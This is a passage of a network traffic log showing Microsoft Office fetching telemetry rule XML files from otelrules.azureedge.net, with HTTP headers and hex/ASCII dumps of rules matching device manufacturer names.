I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49792	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:00 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:00 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:00 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 47d81796-701e-0021-2403-2d3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001500Z-16547b76f7fcjqqhhC1DFWrrrc0000000dc0000000008a51 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:00 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49793	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:00 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:00 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:00 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 09dd2235-b01e-0002-054a-321b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001500Z-17df447cdb5qt2nfhC1DFWzhgw00000006vg00000000m4kc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:00 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	49794	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:00 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:00 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:00 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 2361c5fe-901e-0064-45f6-2ce8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001500Z-16547b76f7fj5p7mhC1DFWf8w40000000dgg0000000074ev x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:00 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49795	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:01 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:01 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:01 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: b89cfbc5-a01e-0032-5d60-321949000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001501Z-17df447cdb5l865xhC1DFW9n7g00000006n0000000005hq7 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:01 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	49796	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:01 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:01 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:01 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: c6b44c52-001e-0028-1ef0-2cc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001501Z-16547b76f7f7scqbhC1DFW0m5w0000000d5000000000hd8n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:01 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	49797	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:01 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:01 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:01 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 7193858a-c01e-0046-425c-322db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001501Z-17df447cdb59mt7dhC1DFWqpg400000009qg0000000070he x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:01 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	49798	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:01 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:01 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:01 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 1d5973b4-701e-0050-2a24-326767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001501Z-16547b76f7f7scqbhC1DFW0m5w0000000d6000000000eu57 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:01 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	49799	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:01 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:01 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:01 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 5d06d88c-b01e-0084-0908-2cd736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001501Z-16547b76f7flf9g6hC1DFWmcx800000003zg000000003xfh x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:01 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:02 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:02 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:02 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: e7016861-001e-000b-65af-3115a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001502Z-17df447cdb5rnd49hC1DFWgmpw0000000430000000001ks7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:02 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:02 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:02 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:02 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: db719d09-901e-005b-33cb-322005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001502Z-16547b76f7f9rdn9hC1DFWfk7s0000000ddg0000000049k3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:02 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:02 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:02 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:02 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 2d611ff0-901e-002a-3d01-2d7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001502Z-16547b76f7fj897nhC1DFWdwq40000000da00000000021s0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:02 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49804	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:02 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:02 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:02 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: ac5f9b79-201e-006e-1645-32bbe3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001502Z-17df447cdb56j5xmhC1DFWn91800000009sg00000000bpvs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:02 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 